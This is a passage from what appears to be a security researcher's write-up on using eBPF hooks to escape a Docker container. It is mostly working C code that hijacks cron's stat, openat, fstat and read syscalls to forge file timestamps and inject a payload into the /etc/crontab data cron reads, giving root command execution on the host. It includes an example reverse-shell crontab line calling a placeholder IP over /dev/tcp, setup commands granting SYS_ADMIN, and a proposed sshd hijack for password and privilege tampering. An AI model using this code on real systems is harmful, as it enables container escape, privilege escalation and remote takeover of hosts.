static __inline int handle_enter_stat(struct bpf_raw_tracepoint_args *ctx){
struct pt_regs *regs;
char buf[0x40];
char *pathname ;
regs = (struct pt_regs *)(ctx->args[0]);
// Read the corresponding NUL-terminated string
pathname = (char *)PT_REGS_PARM1_CORE(regs);
bpf_probe_read_str(buf,sizeof(buf),pathname);
// Check if the file is "/etc/crontab" or "crontabs"
if(memcmp(buf , CRONTAB , sizeof(CRONTAB)) && memcmp(buf,SPOOL_DIR,sizeof(SPOOL_DIR))){
return 0;
}
if(cron_pid == 0){
cron_pid = bpf_get_current_pid_tgid() & 0xffffffff;
//bpf_printk("New cron_pid: %d\n",cron_pid);
}
memcpy(filename_saved , buf , 64);
bpf_printk("[sys_enter::handle_enter_stat()] New filename_saved: %s\n",filename_saved);
//bpf_printk("%lx\n",PT_REGS_PARM2(regs));
// Read the file's state address, saved into statbuf_ptr from regs->rsi
statbuf_ptr = (struct stat *)PT_REGS_PARM2_CORE(regs);
//bpf_probe_read_kernel(&statbuf_ptr , sizeof(statbuf_ptr) , PT_REGS_PARM2(regs));
return 0;
}
The main purpose here is to catch the points where the cron process stats these two file names.
handle_exit_stat()
stat returns.
Our goal at this point is to bypass the two TEQUAL checks shown earlier, so that cron believes the files have been updated and immediately calls process_crontab("root", NULL, SYSCRONTAB, &syscron_stat, &new_db, old_db).
static __inline int handle_exit_stat(){
if(statbuf_ptr == 0){
return 0;
}
bpf_printk("[sys_exit::handle_exit_stat()] cron %d stat() %s\n",cron_pid , filename_saved);
/*
At this point, we need to make sure that the following two conditions are both passed.
Which is equivalent to :
!TEQUAL(old_db->mtim, TMAX(statbuf.st_mtim, syscron_stat.st_mtim)) [1]
!TEQUAL(syscron_stat.st_mtim, ts_zero) [2]
*/
// We intend to set statbuf.st_mtim (SPOOL_DIR) to ZERO and syscron_stat.st_mtim (crontab) to a SMALL RANDOM VALUE
__kernel_ulong_t spool_dir_st_mtime = 0;
__kernel_ulong_t crontab_st_mtime = bpf_get_prandom_u32() & 0xffff; //bpf_get_prandom_u32 Returns a pseudo-random u32.
// Ensure the file is our target
// If we are checking SPOOL_DIR
if(!memcmp(filename_saved , SPOOL_DIR , sizeof(SPOOL_DIR))){
bpf_probe_write_user(&statbuf_ptr->st_mtime , &spool_dir_st_mtime , sizeof(spool_dir_st_mtime) );
}
if(!memcmp(filename_saved , CRONTAB , sizeof(CRONTAB))){
bpf_probe_write_user(&statbuf_ptr->st_mtime , &crontab_st_mtime ,sizeof(crontab_st_mtime));
}
bpf_printk("[sys_exit::handle_exit_stat()] Modify DONE\n");
// update
statbuf_ptr = 0;
return 0;
}
open
open -> open64 -> openat
So we end up hooking openat.
int openat(int dirfd, const char *pathname, int flags);
int openat(int dirfd, const char *pathname, int flags, mode_t mode);
On entry, we check and save the pathname argument in rsi; on exit, we save the returned file descriptor into open_fd.
// int openat(int dirfd , const char * pathname
static __inline int handle_enter_openat(struct bpf_raw_tracepoint_args *ctx) {
struct pt_regs *regs;
char buf[0x40];
char *pathname ;
regs = (struct pt_regs *)(ctx->args[0]);
pathname = (char *)PT_REGS_PARM2_CORE(regs);
bpf_probe_read_str(buf,sizeof(buf),pathname);
// Check if open SYSCRONTAB
if(memcmp(buf , SYSCRONTAB , sizeof(SYSCRONTAB))){
return 0;
}
bpf_printk("[sys_enter::handle_enter_openat] We Got it: %s\n",buf);
// Save to openat_filename_saved
memcpy(openat_filename_saved , buf , 64);
return 0;
}
static __inline int handle_exit_openat(struct bpf_raw_tracepoint_args *ctx){
if(openat_filename_saved[0]==0){
return 0;
}
// Ensure we open SYSCROnTAB
if(!memcmp(openat_filename_saved , SYSCRONTAB , sizeof(SYSCRONTAB)))
{
// save the corresponding file descriptor
open_fd = ctx->args[1];
bpf_printk("[sys_exit::handle_exit_openat()] openat: %s, fd: %d\n",openat_filename_saved , open_fd);
openat_filename_saved[0] = '\0';
}
return 0;
}
ok, now we have the corresponding fd.
fstat
int fstat(int fd, struct stat *statbuf);
// int fstat(int fd, struct stat *statbuf);
static __inline int handle_enter_fstat(struct bpf_raw_tracepoint_args *ctx){
struct pt_regs *regs;
char buf[0x40];
char *pathname ;
int fd=0;
regs = (struct pt_regs *)(ctx->args[0]);
fd = PT_REGS_PARM1_CORE(regs);
if(fd != open_fd){
return 0;
}
bpf_printk("[sys_enter::handle_enter_fstat] We Got fd: %d\n",fd);
statbuf_fstat_ptr = (struct stat *)PT_REGS_PARM2_CORE(regs);
return 0;
}
static __inline int handle_exit_fstat(){
if(open_fd == 0){
return 0;
}
if(statbuf_fstat_ptr == 0){
return 0;
}
__kernel_ulong_t crontab_st_mtime = bpf_get_prandom_u32() & 0xffff;
// bpf_printk("[sys_exit::handle_exit_fstat]: HIT!\n");
bpf_probe_write_user(&statbuf_fstat_ptr->st_mtime , &crontab_st_mtime ,sizeof(crontab_st_mtime));
bpf_printk("[sys_exit::handle_exit_fstat()] Modify DONE\n");
//open_fd = 0;
return 0;
}
read
// read(int fd, void *buf, size_t count);
static __inline int handle_enter_read(struct bpf_raw_tracepoint_args *ctx){
int pid=0;
pid = bpf_get_current_pid_tgid() & 0xffffffff;
if(pid!=cron_pid){
return 0;
}
struct pt_regs *regs;
char buf[0x40];
char *pathname ;
int fd=0;
regs = (struct pt_regs *)(ctx->args[0]);
fd = PT_REGS_PARM1_CORE(regs);
read_buf_ptr = (void *)PT_REGS_PARM2_CORE(regs);
if(fd != open_fd){
jump_flag = MISS;
return 0;
}
jump_flag = HIT;
bpf_printk("[sys_enter::handle_enter_read] fd is %d\n",fd);
bpf_printk("[sys_enter::handle_enter_read] read_buf is : 0x%lx\n",read_buf_ptr);
return 0;
}
static __inline int handle_exit_read(struct bpf_raw_tracepoint_args *ctx){
if(jump_flag == MISS){
return 0;
}
int pid=0;
pid = bpf_get_current_pid_tgid() & 0xffffffff;
if(pid!=cron_pid){
return 0;
}
if(read_buf_ptr == 0){
return 0;
}
ssize_t ret = ctx->args[1];
if (ret <= 0)
{
read_buf_ptr = 0;
bpf_printk("[sys_exut::handle_exit_read] read failed!\n");
return 0;
}
bpf_printk("[sys_exut::handle_exit_read] your read length: 0x%lx\n",ret);
if (ret < sizeof(PAYLOAD))
{
bpf_printk("PAYLOAD too long\n");
read_buf_ptr = 0;
return 0;
}
bpf_printk("[sys_exut::handle_exit_read] target write addr: 0x%lx\n",read_buf_ptr);
//bpf_printk("%s\n",(char *)(read_buf_ptr+0x2bb));
bpf_probe_write_user((char *)(read_buf_ptr), PAYLOAD, sizeof(PAYLOAD));
bpf_printk("[sys_exut::handle_exit_read] sizeof PAYLOAD(%d) ; HIJACK DONE!\n",sizeof(PAYLOAD));
read_buf_ptr = 0;
jump_flag = MISS;
return 0;
}
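For completeness: PAYLOAD is defined elsewhere in the hook program and its exact value is not shown in this article; it only needs to be a newline-terminated line in /etc/crontab's system format (including the user field), short enough to fit in the data cron just read. A hypothetical example:

/* hypothetical example payload -- the IP/port are placeholders */
#define PAYLOAD "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/10.0.2.10/4444 0>&1'\n"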
First build the corresponding environment
FROM ubuntu:20.04
ARG DEBIAN_FRONTEND=noninteractive
# Use sed -i to do a global string replacement and switch the apt sources to a mirror
RUN \
sed -i "s/http:\/\/archive.ubuntu.com/http:\/\/mirrors.163.com/g" /etc/apt/sources.list && \
sed -i "s/http:\/\/security.ubuntu.com/http:\/\/mirrors.163.com/g" /etc/apt/sources.list && \
apt-get update && \
apt-get -y dist-upgrade && \
apt-get install -y lib32z1 ssh cpio libelf-dev
RUN useradd -m ctf
CMD ["/bin/sh"]
EXPOSE 9999
docker build -t <image-name> .
docker run -ti --cap-add SYS_ADMIN <image-name> /bin/sh   # note that SYS_ADMIN is granted here
docker cp ./hello <container-id>:/
Just run the corresponding file directly in docker.
Of course, it can be observed from the log of cron:
journalctl -f -u cron
Finally, the command gets executed outside of Docker, on the host.
After reading that article, it is natural to wonder: since eBPF can be used to hijack the system calls of other processes, can it be used for something else, for example targeting high-privileged user-mode processes other than crond? A fairly obvious candidate is the sshd process.
In fact, sshd hijacking can indeed be achieved through eBPF. The principle is similar to the crontab hook above, and the final effects include but are not limited to:
- Patch the original user's password.
- Modify a low-privileged user to a high-privileged login user.
- Log in directly with a non-existing user.
However, as a pwn/binary person, I am not entirely sure what this is best used for in practice, but it can indeed achieve such an effect. My implementation code can be found at: https://github.com/OrangeGzY/Eebpf-kit/blob/main/libbpf-bootstrap/examples/c/esshd.bpf.c